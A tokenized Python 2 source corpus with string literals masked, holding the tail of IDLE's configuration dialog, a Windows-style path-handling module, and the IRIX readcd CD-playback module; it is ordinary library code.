<NUM_LIT:2> ] , '<STR_LIT:;>' ) ) <EOL> def LoadFontCfg ( self ) : <EOL> fonts = list ( tkFont . families ( self ) ) <EOL> fonts . sort ( ) <EOL> for font in fonts : <EOL> self . listFontName . insert ( END , font ) <EOL> configuredFont = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = '<STR_LIT>' ) <EOL> lc_configuredFont = configuredFont . lower ( ) <EOL> self . fontName . set ( lc_configuredFont ) <EOL> lc_fonts = [ s . lower ( ) for s in fonts ] <EOL> if lc_configuredFont in lc_fonts : <EOL> currentFontIndex = lc_fonts . index ( lc_configuredFont ) <EOL> self . listFontName . see ( currentFontIndex ) <EOL> self . listFontName . select_set ( currentFontIndex ) <EOL> self . listFontName . select_anchor ( currentFontIndex ) <EOL> fontSize = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = '<STR_LIT>' ) <EOL> self . optMenuFontSize . SetMenu ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , fontSize ) <EOL> self . fontBold . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , default = <NUM_LIT:0> , type = '<STR_LIT:bool>' ) ) <EOL> self . SetFontSample ( ) <EOL> def LoadTabCfg ( self ) : <EOL> spaceNum = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = <NUM_LIT:4> , type = '<STR_LIT:int>' ) <EOL> self . spaceNum . set ( spaceNum ) <EOL> def LoadThemeCfg ( self ) : <EOL> self . themeIsBuiltin . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , <EOL> type = '<STR_LIT:bool>' , default = <NUM_LIT:1> ) ) <EOL> currentOption = idleConf . CurrentTheme ( ) <EOL> if self . themeIsBuiltin . get ( ) : <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuThemeBuiltin . SetMenu ( itemList , currentOption ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> if not itemList : <EOL> self . radioThemeCustom . config ( state = DISABLED ) <EOL> self . customTheme . set ( '<STR_LIT>' ) <EOL> else : <EOL> self . optMenuThemeCustom . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> else : <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuThemeCustom . SetMenu ( itemList , currentOption ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuThemeBuiltin . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> self . SetThemeType ( ) <EOL> themeNames = self . themeElements . keys ( ) <EOL> themeNames . sort ( self . __ThemeNameIndexCompare ) <EOL> self . optMenuHighlightTarget . SetMenu ( themeNames , themeNames [ <NUM_LIT:0> ] ) <EOL> self . PaintThemeSample ( ) <EOL> self . SetHighlightTarget ( ) <EOL> def __ThemeNameIndexCompare ( self , a , b ) : <EOL> if self . themeElements [ a ] [ <NUM_LIT:1> ] < self . themeElements [ b ] [ <NUM_LIT:1> ] : return - <NUM_LIT:1> <EOL> elif self . themeElements [ a ] [ <NUM_LIT:1> ] == self . themeElements [ b ] [ <NUM_LIT:1> ] : return <NUM_LIT:0> <EOL> else : return <NUM_LIT:1> <EOL> def LoadKeyCfg ( self ) : <EOL> self . keysAreBuiltin . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , <EOL> type = '<STR_LIT:bool>' , default = <NUM_LIT:1> ) ) <EOL> currentOption = idleConf . CurrentKeys ( ) <EOL> if self . keysAreBuiltin . get ( ) : <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuKeysBuiltin . SetMenu ( itemList , currentOption ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> if not itemList : <EOL> self . radioKeysCustom . config ( state = DISABLED ) <EOL> self . customKeys . set ( '<STR_LIT>' ) <EOL> else : <EOL> self . optMenuKeysCustom . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> else : <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuKeysCustom . SetMenu ( itemList , currentOption ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuKeysBuiltin . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> self . SetKeysType ( ) <EOL> keySetName = idleConf . CurrentKeys ( ) <EOL> self . LoadKeysList ( keySetName ) <EOL> def LoadGeneralCfg ( self ) : <EOL> self . startupEdit . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , default = <NUM_LIT:1> , type = '<STR_LIT:bool>' ) ) <EOL> self . autoSave . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = <NUM_LIT:0> , type = '<STR_LIT:bool>' ) ) <EOL> self . winWidth . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:width>' ) ) <EOL> self . winHeight . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . paraWidth . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . encoding . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , default = '<STR_LIT:none>' ) ) <EOL> self . userHelpList = idleConf . GetAllExtraHelpSourcesList ( ) <EOL> for helpItem in self . userHelpList : <EOL> self . listHelp . insert ( END , helpItem [ <NUM_LIT:0> ] ) <EOL> self . SetHelpListButtonStates ( ) <EOL> def LoadConfigs ( self ) : <EOL> """<STR_LIT>""" <EOL> self . LoadFontCfg ( ) <EOL> self . LoadTabCfg ( ) <EOL> self . LoadThemeCfg ( ) <EOL> self . LoadKeyCfg ( ) <EOL> self . LoadGeneralCfg ( ) <EOL> def SaveNewKeySet ( self , keySetName , keySet ) : <EOL> """<STR_LIT>""" <EOL> if not idleConf . userCfg [ '<STR_LIT>' ] . has_section ( keySetName ) : <EOL> idleConf . userCfg [ '<STR_LIT>' ] . add_section ( keySetName ) <EOL> for event in keySet . keys ( ) : <EOL> value = keySet [ event ] <EOL> idleConf . userCfg [ '<STR_LIT>' ] . SetOption ( keySetName , event , value ) <EOL> def SaveNewTheme ( self , themeName , theme ) : <EOL> """<STR_LIT>""" <EOL> if not idleConf . userCfg [ '<STR_LIT>' ] . has_section ( themeName ) : <EOL> idleConf . userCfg [ '<STR_LIT>' ] . add_section ( themeName ) <EOL> for element in theme . keys ( ) : <EOL> value = theme [ element ] <EOL> idleConf . userCfg [ '<STR_LIT>' ] . SetOption ( themeName , element , value ) <EOL> def SetUserValue ( self , configType , section , item , value ) : <EOL> if idleConf . defaultCfg [ configType ] . has_option ( section , item ) : <EOL> if idleConf . defaultCfg [ configType ] . Get ( section , item ) == value : <EOL> return idleConf . userCfg [ configType ] . RemoveOption ( section , item ) <EOL> return idleConf . userCfg [ configType ] . SetOption ( section , item , value ) <EOL> def SaveAllChangedConfigs ( self ) : <EOL> "<STR_LIT>" <EOL> idleConf . userCfg [ '<STR_LIT>' ] . Save ( ) <EOL> for configType in self . changedItems . keys ( ) : <EOL> cfgTypeHasChanges = False <EOL> for section in self . changedItems [ configType ] . keys ( ) : <EOL> if section == '<STR_LIT>' : <EOL> idleConf . userCfg [ '<STR_LIT>' ] . remove_section ( '<STR_LIT>' ) <EOL> cfgTypeHasChanges = True <EOL> for item in self . changedItems [ configType ] [ section ] . keys ( ) : <EOL> value = self . changedItems [ configType ] [ section ] [ item ] <EOL> if self . SetUserValue ( configType , section , item , value ) : <EOL> cfgTypeHasChanges = True <EOL> if cfgTypeHasChanges : <EOL> idleConf . userCfg [ configType ] . Save ( ) <EOL> for configType in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> idleConf . userCfg [ configType ] . Save ( ) <EOL> self . ResetChangedItems ( ) <EOL> def DeactivateCurrentConfig ( self ) : <EOL> winInstances = self . parent . instance_dict . keys ( ) <EOL> for instance in winInstances : <EOL> instance . RemoveKeybindings ( ) <EOL> def ActivateConfigChanges ( self ) : <EOL> "<STR_LIT>" <EOL> winInstances = self . parent . instance_dict . keys ( ) <EOL> for instance in winInstances : <EOL> instance . ResetColorizer ( ) <EOL> instance . ResetFont ( ) <EOL> instance . set_notabs_indentwidth ( ) <EOL> instance . ApplyKeybindings ( ) <EOL> instance . reset_help_menu_entries ( ) <EOL> def Cancel ( self ) : <EOL> self . destroy ( ) <EOL> def Ok ( self ) : <EOL> self . Apply ( ) <EOL> self . destroy ( ) <EOL> def Apply ( self ) : <EOL> self . DeactivateCurrentConfig ( ) <EOL> self . SaveAllChangedConfigs ( ) <EOL> self . ActivateConfigChanges ( ) <EOL> def Help ( self ) : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> root = Tk ( ) <EOL> Button ( root , text = '<STR_LIT>' , <EOL> command = lambda : ConfigDialog ( root , '<STR_LIT>' ) ) . pack ( ) <EOL> root . instance_dict = { } <EOL> root . mainloop ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import stat <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> curdir = '<STR_LIT:.>' <EOL> pardir = '<STR_LIT:..>' <EOL> extsep = '<STR_LIT:.>' <EOL> sep = '<STR_LIT:/>' <EOL> altsep = '<STR_LIT:\\>' <EOL> pathsep = '<STR_LIT:;>' <EOL> defpath = '<STR_LIT>' <EOL> devnull = '<STR_LIT>' <EOL> def normcase ( s ) : <EOL> """<STR_LIT>""" <EOL> return s . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) . lower ( ) <EOL> def isabs ( s ) : <EOL> """<STR_LIT>""" <EOL> s = splitdrive ( s ) [ <NUM_LIT:1> ] <EOL> return s != '<STR_LIT>' and s [ : <NUM_LIT:1> ] in '<STR_LIT>' <EOL> def join ( a , * p ) : <EOL> """<STR_LIT>""" <EOL> path = a <EOL> for b in p : <EOL> if isabs ( b ) : <EOL> path = b <EOL> elif path == '<STR_LIT>' or path [ - <NUM_LIT:1> : ] in '<STR_LIT>' : <EOL> path = path + b <EOL> else : <EOL> path = path + '<STR_LIT:/>' + b <EOL> return path <EOL> def splitdrive ( p ) : <EOL> """<STR_LIT>""" <EOL> if p [ <NUM_LIT:1> : <NUM_LIT:2> ] == '<STR_LIT::>' : <EOL> return p [ <NUM_LIT:0> : <NUM_LIT:2> ] , p [ <NUM_LIT:2> : ] <EOL> return '<STR_LIT>' , p <EOL> def splitunc ( p ) : <EOL> """<STR_LIT>""" <EOL> if p [ <NUM_LIT:1> : <NUM_LIT:2> ] == '<STR_LIT::>' : <EOL> return '<STR_LIT>' , p <EOL> firstTwo = p [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> if firstTwo == '<STR_LIT:/>' * <NUM_LIT:2> or firstTwo == '<STR_LIT:\\>' * <NUM_LIT:2> : <EOL> normp = normcase ( p ) <EOL> index = normp . find ( '<STR_LIT:/>' , <NUM_LIT:2> ) <EOL> if index == - <NUM_LIT:1> : <EOL> return ( "<STR_LIT>" , p ) <EOL> index = normp . find ( '<STR_LIT:/>' , index + <NUM_LIT:1> ) <EOL> if index == - <NUM_LIT:1> : <EOL> index = len ( p ) <EOL> return p [ : index ] , p [ index : ] <EOL> return '<STR_LIT>' , p <EOL> def split ( p ) : <EOL> """<STR_LIT>""" <EOL> d , p = splitdrive ( p ) <EOL> i = len ( p ) <EOL> while i and p [ i - <NUM_LIT:1> ] not in '<STR_LIT>' : <EOL> i = i - <NUM_LIT:1> <EOL> head , tail = p [ : i ] , p [ i : ] <EOL> head2 = head <EOL> while head2 and head2 [ - <NUM_LIT:1> ] in '<STR_LIT>' : <EOL> head2 = head2 [ : - <NUM_LIT:1> ] <EOL> head = head2 or head <EOL> return d + head , tail <EOL> def splitext ( p ) : <EOL> """<STR_LIT>""" <EOL> root , ext = '<STR_LIT>' , '<STR_LIT>' <EOL> for c in p : <EOL> if c in [ '<STR_LIT:/>' , '<STR_LIT:\\>' ] : <EOL> root , ext = root + ext + c , '<STR_LIT>' <EOL> elif c == '<STR_LIT:.>' : <EOL> if ext : <EOL> root , ext = root + ext , c <EOL> else : <EOL> ext = c <EOL> elif ext : <EOL> ext = ext + c <EOL> else : <EOL> root = root + c <EOL> return root , ext <EOL> def basename ( p ) : <EOL> """<STR_LIT>""" <EOL> return split ( p ) [ <NUM_LIT:1> ] <EOL> def dirname ( p ) : <EOL> """<STR_LIT>""" <EOL> return split ( p ) [ <NUM_LIT:0> ] <EOL> def commonprefix ( m ) : <EOL> "<STR_LIT>" <EOL> if not m : return '<STR_LIT>' <EOL> s1 = min ( m ) <EOL> s2 = max ( m ) <EOL> n = min ( len ( s1 ) , len ( s2 ) ) <EOL> for i in xrange ( n ) : <EOL> if s1 [ i ] != s2 [ i ] : <EOL> return s1 [ : i ] <EOL> return s1 [ : n ] <EOL> def getsize ( filename ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( filename ) . st_size <EOL> def getmtime ( filename ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( filename ) . st_mtime <EOL> def getatime ( filename ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( filename ) . st_atime <EOL> def getctime ( filename ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( filename ) . st_ctime <EOL> def islink ( path ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def exists ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> st = os . stat ( path ) <EOL> except os . error : <EOL> return False <EOL> return True <EOL> lexists = exists <EOL> def isdir ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> st = os . stat ( path ) <EOL> except os . error : <EOL> return False <EOL> return stat . S_ISDIR ( st . st_mode ) <EOL> def isfile ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> st = os . stat ( path ) <EOL> except os . error : <EOL> return False <EOL> return stat . S_ISREG ( st . st_mode ) <EOL> def ismount ( path ) : <EOL> """<STR_LIT>""" <EOL> unc , rest = splitunc ( path ) <EOL> if unc : <EOL> return rest in ( "<STR_LIT>" , "<STR_LIT:/>" , "<STR_LIT:\\>" ) <EOL> p = splitdrive ( path ) [ <NUM_LIT:1> ] <EOL> return len ( p ) == <NUM_LIT:1> and p [ <NUM_LIT:0> ] in '<STR_LIT>' <EOL> def walk ( top , func , arg ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> names = os . listdir ( top ) <EOL> except os . error : <EOL> return <EOL> func ( arg , top , names ) <EOL> exceptions = ( '<STR_LIT:.>' , '<STR_LIT:..>' ) <EOL> for name in names : <EOL> if name not in exceptions : <EOL> name = join ( top , name ) <EOL> if isdir ( name ) : <EOL> walk ( name , func , arg ) <EOL> def expanduser ( path ) : <EOL> """<STR_LIT>""" <EOL> if path [ : <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> return path <EOL> i , n = <NUM_LIT:1> , len ( path ) <EOL> while i < n and path [ i ] not in '<STR_LIT>' : <EOL> i = i + <NUM_LIT:1> <EOL> if i == <NUM_LIT:1> : <EOL> if '<STR_LIT>' in os . environ : <EOL> userhome = os . environ [ '<STR_LIT>' ] <EOL> elif not '<STR_LIT>' in os . environ : <EOL> return path <EOL> else : <EOL> try : <EOL> drive = os . environ [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> drive = '<STR_LIT>' <EOL> userhome = join ( drive , os . environ [ '<STR_LIT>' ] ) <EOL> else : <EOL> return path <EOL> return userhome + path [ i : ] <EOL> def expandvars ( path ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:$>' not in path : <EOL> return path <EOL> import string <EOL> varchars = string . letters + string . digits + '<STR_LIT>' <EOL> res = '<STR_LIT>' <EOL> index = <NUM_LIT:0> <EOL> pathlen = len ( path ) <EOL> while index < pathlen : <EOL> c = path [ index ] <EOL> if c == '<STR_LIT>' : <EOL> path = path [ index + <NUM_LIT:1> : ] <EOL> pathlen = len ( path ) <EOL> try : <EOL> index = path . index ( '<STR_LIT>' ) <EOL> res = res + '<STR_LIT>' + path [ : index + <NUM_LIT:1> ] <EOL> except ValueError : <EOL> res = res + path <EOL> index = pathlen - <NUM_LIT:1> <EOL> elif c == '<STR_LIT:$>' : <EOL> if path [ index + <NUM_LIT:1> : index + <NUM_LIT:2> ] == '<STR_LIT:$>' : <EOL> res = res + c <EOL> index = index + <NUM_LIT:1> <EOL> elif path [ index + <NUM_LIT:1> : index + <NUM_LIT:2> ] == '<STR_LIT:{>' : <EOL> path = path [ index + <NUM_LIT:2> : ] <EOL> pathlen = len ( path ) <EOL> try : <EOL> index = path . index ( '<STR_LIT:}>' ) <EOL> var = path [ : index ] <EOL> if var in os . environ : <EOL> res = res + os . environ [ var ] <EOL> except ValueError : <EOL> res = res + path <EOL> index = pathlen - <NUM_LIT:1> <EOL> else : <EOL> var = '<STR_LIT>' <EOL> index = index + <NUM_LIT:1> <EOL> c = path [ index : index + <NUM_LIT:1> ] <EOL> while c != '<STR_LIT>' and c in varchars : <EOL> var = var + c <EOL> index = index + <NUM_LIT:1> <EOL> c = path [ index : index + <NUM_LIT:1> ] <EOL> if var in os . environ : <EOL> res = res + os . environ [ var ] <EOL> if c != '<STR_LIT>' : <EOL> res = res + c <EOL> else : <EOL> res = res + c <EOL> index = index + <NUM_LIT:1> <EOL> return res <EOL> def normpath ( path ) : <EOL> """<STR_LIT>""" <EOL> path = path . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> prefix , path = splitdrive ( path ) <EOL> while path [ : <NUM_LIT:1> ] == '<STR_LIT:/>' : <EOL> prefix = prefix + '<STR_LIT:/>' <EOL> path = path [ <NUM_LIT:1> : ] <EOL> comps = path . split ( '<STR_LIT:/>' ) <EOL> i = <NUM_LIT:0> <EOL> while i < len ( comps ) : <EOL> if comps [ i ] == '<STR_LIT:.>' : <EOL> del comps [ i ] <EOL> elif comps [ i ] == '<STR_LIT:..>' and i > <NUM_LIT:0> and comps [ i - <NUM_LIT:1> ] not in ( '<STR_LIT>' , '<STR_LIT:..>' ) : <EOL> del comps [ i - <NUM_LIT:1> : i + <NUM_LIT:1> ] <EOL> i = i - <NUM_LIT:1> <EOL> elif comps [ i ] == '<STR_LIT>' and i > <NUM_LIT:0> and comps [ i - <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> del comps [ i ] <EOL> else : <EOL> i = i + <NUM_LIT:1> <EOL> if not prefix and not comps : <EOL> comps . append ( '<STR_LIT:.>' ) <EOL> return prefix + '<STR_LIT:/>' . join ( comps ) <EOL> def abspath ( path ) : <EOL> """<STR_LIT>""" <EOL> if not isabs ( path ) : <EOL> path = join ( os . getcwd ( ) , path ) <EOL> return normpath ( path ) <EOL> realpath = abspath <EOL> supports_unicode_filenames = False </s>
<s> import cd , CD <EOL> class Error ( Exception ) : <EOL> pass <EOL> class _Stop ( Exception ) : <EOL> pass <EOL> def _doatime ( self , cb_type , data ) : <EOL> if ( ( data [ <NUM_LIT:0> ] * <NUM_LIT> ) + data [ <NUM_LIT:1> ] ) * <NUM_LIT> + data [ <NUM_LIT:2> ] > self . end : <EOL> raise _Stop <EOL> func , arg = self . callbacks [ cb_type ] <EOL> if func : <EOL> func ( arg , cb_type , data ) <EOL> def _dopnum ( self , cb_type , data ) : <EOL> if data > self . end : <EOL> raise _Stop <EOL> func , arg = self . callbacks [ cb_type ] <EOL> if func : <EOL> func ( arg , cb_type , data ) <EOL> class Readcd : <EOL> def __init__ ( self , * arg ) : <EOL> if len ( arg ) == <NUM_LIT:0> : <EOL> self . player = cd . open ( ) <EOL> elif len ( arg ) == <NUM_LIT:1> : <EOL> self . player = cd . open ( arg [ <NUM_LIT:0> ] ) <EOL> elif len ( arg ) == <NUM_LIT:2> : <EOL> self . player = cd . open ( arg [ <NUM_LIT:0> ] , arg [ <NUM_LIT:1> ] ) <EOL> else : <EOL> raise Error , '<STR_LIT>' <EOL> self . list = [ ] <EOL> self . callbacks = [ ( None , None ) ] * <NUM_LIT:8> <EOL> self . parser = cd . createparser ( ) <EOL> self . playing = <NUM_LIT:0> <EOL> self . end = <NUM_LIT:0> <EOL> self . status = None <EOL> self . trackinfo = None <EOL> def eject ( self ) : <EOL> self . player . eject ( ) <EOL> self . list = [ ] <EOL> self . end = <NUM_LIT:0> <EOL> self . listindex = <NUM_LIT:0> <EOL> self . status = None <EOL> self . trackinfo = None <EOL> if self . playing : <EOL> raise _Stop <EOL> def pmsf2msf ( self , track , min , sec , frame ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> if track < self . status [ <NUM_LIT:5> ] or track > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> if not self . trackinfo : <EOL> self . cacheinfo ( ) <EOL> start , total = self . trackinfo [ track ] <EOL> start = ( ( start [ <NUM_LIT:0> ] * <NUM_LIT> ) + start [ <NUM_LIT:1> ] ) * <NUM_LIT> + start [ <NUM_LIT:2> ] <EOL> total = ( ( total [ <NUM_LIT:0> ] * <NUM_LIT> ) + total [ <NUM_LIT:1> ] ) * <NUM_LIT> + total [ <NUM_LIT:2> ] <EOL> block = ( ( min * <NUM_LIT> ) + sec ) * <NUM_LIT> + frame <EOL> if block > total : <EOL> raise Error , '<STR_LIT>' <EOL> block = start + block <EOL> min , block = divmod ( block , <NUM_LIT> * <NUM_LIT> ) <EOL> sec , frame = divmod ( block , <NUM_LIT> ) <EOL> return min , sec , frame <EOL> def reset ( self ) : <EOL> self . list = [ ] <EOL> def appendtrack ( self , track ) : <EOL> self . appendstretch ( track , track ) <EOL> def appendstretch ( self , start , end ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> if not start : <EOL> start = <NUM_LIT:1> <EOL> if not end : <EOL> end = self . status [ <NUM_LIT:6> ] <EOL> if type ( end ) == type ( <NUM_LIT:0> ) : <EOL> if end < self . status [ <NUM_LIT:5> ] or end > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> else : <EOL> l = len ( end ) <EOL> if l == <NUM_LIT:4> : <EOL> prog , min , sec , frame = end <EOL> if prog < self . status [ <NUM_LIT:5> ] or prog > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> end = self . pmsf2msf ( prog , min , sec , frame ) <EOL> elif l != <NUM_LIT:3> : <EOL> raise Error , '<STR_LIT>' <EOL> if type ( start ) == type ( <NUM_LIT:0> ) : <EOL> if start < self . status [ <NUM_LIT:5> ] or start > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> if len ( self . list ) > <NUM_LIT:0> : <EOL> s , e = self . list [ - <NUM_LIT:1> ] <EOL> if type ( e ) == type ( <NUM_LIT:0> ) : <EOL> if start == e + <NUM_LIT:1> : <EOL> start = s <EOL> del self . list [ - <NUM_LIT:1> ] <EOL> else : <EOL> l = len ( start ) <EOL> if l == <NUM_LIT:4> : <EOL> prog , min , sec , frame = start <EOL> if prog < self . status [ <NUM_LIT:5> ] or prog > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> start = self . pmsf2msf ( prog , min , sec , frame ) <EOL> elif l != <NUM_LIT:3> : <EOL> raise Error , '<STR_LIT>' <EOL> self . list . append ( ( start , end ) ) <EOL> def settracks ( self , list ) : <EOL> self . list = [ ] <EOL> for track in list : <EOL> self . appendtrack ( track ) <EOL> def setcallback ( self , cb_type , func , arg ) : <EOL> if cb_type < <NUM_LIT:0> or cb_type >= <NUM_LIT:8> : <EOL> raise Error , '<STR_LIT>' <EOL> self . callbacks [ cb_type ] = ( func , arg ) <EOL> if self . playing : <EOL> start , end = self . list [ self . listindex ] <EOL> if type ( end ) == type ( <NUM_LIT:0> ) : <EOL> if cb_type != CD . PNUM : <EOL> self . parser . setcallback ( cb_type , func , arg ) <EOL> else : <EOL> if cb_type != CD . ATIME : <EOL> self . parser . setcallback ( cb_type , func , arg ) <EOL> def removecallback ( self , cb_type ) : <EOL> if cb_type < <NUM_LIT:0> or cb_type >= <NUM_LIT:8> : <EOL> raise Error , '<STR_LIT>' <EOL> self . callbacks [ cb_type ] = ( None , None ) <EOL> if self . playing : <EOL> start , end = self . list [ self . listindex ] <EOL> if type ( end ) == type ( <NUM_LIT:0> ) : <EOL> if cb_type != CD . PNUM : <EOL> self . parser . removecallback ( cb_type ) <EOL> else : <EOL> if cb_type != CD . ATIME : <EOL> self . parser . removecallback ( cb_type ) <EOL> def gettrackinfo ( self , * arg ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> if not self . trackinfo : <EOL> self . cacheinfo ( ) <EOL> if len ( arg ) == <NUM_LIT:0> : <EOL> return self . trackinfo [ self . status [ <NUM_LIT:5> ] : self . status [ <NUM_LIT:6> ] + <NUM_LIT:1> ] <EOL> result = [ ] <EOL> for i in arg : <EOL> if i < self . status [ <NUM_LIT:5> ] or i > self . status [ <NUM_LIT:6> ] : <EOL> raise Error , '<STR_LIT>' <EOL> result . append ( self . trackinfo [ i ] ) <EOL> return result <EOL> def cacheinfo ( self ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> self . trackinfo = [ ] <EOL> for i in range ( self . status [ <NUM_LIT:5> ] ) : <EOL> self . trackinfo . append ( None ) <EOL> for i in range ( self . status [ <NUM_LIT:5> ] , self . status [ <NUM_LIT:6> ] + <NUM_LIT:1> ) : <EOL> self . trackinfo . append ( self . player . gettrackinfo ( i ) ) <EOL> def cachestatus ( self ) : <EOL> self . status = self . player . getstatus ( ) <EOL> if self . status [ <NUM_LIT:0> ] == CD . NODISC : <EOL> self . status = None <EOL> raise Error , '<STR_LIT>' <EOL> def getstatus ( self ) : <EOL> return self . player . getstatus ( ) <EOL> def play ( self ) : <EOL> if not self . status : <EOL> self . cachestatus ( ) <EOL> size = self . player . bestreadsize ( ) <EOL> self . listindex = <NUM_LIT:0> <EOL> self . playing = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> func , arg = self . callbacks [ i ] <EOL> if func : <EOL> self . parser . setcallback ( i , func , arg ) <EOL> else : <EOL> self . parser . removecallback ( i ) <EOL> if len ( self . list ) == <NUM_LIT:0> : <EOL> for i in range ( self . status [ <NUM_LIT:5> ] , self . status [ <NUM_LIT:6> ] + <NUM_LIT:1> ) : <EOL> self . appendtrack ( i ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> if not self . playing : <EOL> if self . listindex >= len ( self . list ) : <EOL> return <EOL> start , end = self . list [ self . listindex ] <EOL> if type ( start ) == type ( <NUM_LIT:0> ) : <EOL> dummy = self . player . seektrack ( <EOL> start ) <EOL> else : <EOL> min , sec , frame = start <EOL> dummy = self . player . seek ( <EOL> min , sec , frame ) <EOL> if type ( end ) == type ( <NUM_LIT:0> ) : <EOL> self . parser . setcallback ( <EOL> CD . PNUM , _dopnum , self ) <EOL> self . end = end <EOL> func , arg = self . callbacks [ CD . ATIME ] <EOL> if func : <EOL> self . parser . setcallback ( CD . ATIME , func , arg ) <EOL> else : <EOL> self . parser . removecallback ( CD . ATIME ) <EOL> else : <EOL> min , sec , frame = end <EOL> self . parser . setcallback ( <EOL> CD . ATIME , _doatime , <EOL> self ) <EOL> self . end = ( min * <NUM_LIT> + sec ) * <NUM_LIT> + frame <EOL> func , arg = self . callbacks [ CD . PNUM ] <EOL> if func : <EOL> self . parser . setcallback ( CD . PNUM , func , arg ) <EOL> else : <EOL> self . parser . removecallback ( CD . PNUM ) <EOL> self . playing = <NUM_LIT:1> <EOL> data = self . player . readda ( size ) <EOL> if data == '<STR_LIT>' : <EOL> self . playing = <NUM_LIT:0> <EOL> self . listindex = self . listindex + <NUM_LIT:1> <EOL> continue <EOL> try : <EOL> self . parser . parseframe ( data ) <EOL> except _Stop : <EOL> self . playing = <NUM_LIT:0> <EOL> self . listindex = self . listindex + <NUM_LIT:1> <EOL> finally : <EOL> self . playing = <NUM_LIT:0> </s>
